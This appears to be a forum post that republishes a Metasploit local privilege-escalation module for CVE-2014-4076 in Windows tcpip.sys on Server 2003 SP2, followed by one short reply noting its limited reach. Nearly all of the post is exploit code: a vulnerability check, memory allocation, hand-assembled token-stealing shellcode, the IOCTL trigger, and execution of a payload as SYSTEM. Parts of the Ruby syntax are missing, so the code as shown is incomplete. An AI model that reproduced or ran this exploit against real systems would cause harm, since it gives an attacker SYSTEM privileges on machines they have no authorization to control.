Jump to content
Sign in to follow this  

Windows tcpip.sys Arbitrary Write Privilege Escalation

Recommended Posts

# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking

include Msf::Exploit::Local::WindowsKernel
include Msf::Post::File
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process

def initialize(info={})
super(update_info(info, {
'Name' => 'Windows tcpip.sys Arbitrary Write Privilege Escalation',
'Description' => %q{
A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys,
can allow an attacker to inject controlled memory into an arbitrary
location within the kernel.
'License' => MSF_LICENSE,
'Author' =>
'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
'Jay Smith <jsmith[at]korelogic.com>' # MSF module
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
'EXITFUNC' => 'thread',
'Targets' =>
['Windows Server 2003 SP2',
'_KPROCESS' => "\x38",
'_TOKEN' => "\xd8",
'_UPID' => "\x94",
'_APLINKS' => "\x98"
'References' =>
['CVE', '2014-4076'],
['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
'DisclosureDate'=> 'Nov 11 2014',
'DefaultTarget' => 0


def check
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Safe

handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
return Exploit::CheckCode::Safe unless handle


file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
unless file?(file_path)
return Exploit::CheckCode::Unknown

major, minor, build, revision, branch = file_version(file_path)
vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440)
return Exploit::CheckCode::Vulnerable

return Exploit::CheckCode::Safe

def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')

if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")

unless check == Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")

handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
if handle.nil?
fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")

print_status("Storing the shellcode in memory...")
this_proc = session.sys.process.open

session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")

unless this_proc.memory.writable?(0x1000)
fail_with(Failure::Unknown, 'Failed to allocate memory')

buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"

sc = token_stealing_shellcode(target, nil, nil, false)
# move up the stack frames looking for nt!KiSystemServicePostCall
sc << "\x31\xc9" # xor ecx, ecx
sc << "\x89\xeb" # mov ebx, ebp
# count_frames
sc << "\x41" # inc ecx
sc << "\xf7\x43\x04\x00\x00\x00\x80" # test dword [ebx+4], 0x80000000
sc << "\x8b\x1b" # mov ebx, dword [ebx]
sc << "\x75\xf4" # jne short count_frames
sc << "\x49" # dec ecx
# loop_frames
sc << "\x49" # dec ecx
sc << "\x89\xec" # mov esp, ebp
sc << "\x5d" # pop ebp
sc << "\x83\xf9\x00" # cmp ecx, 0
sc << "\x75\xf7" # jne loop_frames
sc << "\x31\xc0" # xor eax, eax
sc << "\xc3" # ret

this_proc.memory.write(0x28, "\x87\xff\xff\x38")
this_proc.memory.write(0x38, "\x00\x00")
this_proc.memory.write(0x1100, buf)
this_proc.memory.write(0x2b, "\x00\x00")
this_proc.memory.write(0x2000, sc)

print_status("Triggering the vulnerability...")
session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
#session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it

print_status("Checking privileges after exploitation...")

unless is_system?
fail_with(Failure::Unknown, "The exploitation wasn't successful")

print_good("Exploitation successful!")
unless execute_shellcode(payload.encoded, nil, this_proc.pid)
fail_with(Failure::Unknown, 'Error while executing the payload')



Share this post

Link to post
Share on other sites

Super. Pacat ca e limitat.

    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440)      
return Exploit::CheckCode::Vulnerable

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Create New...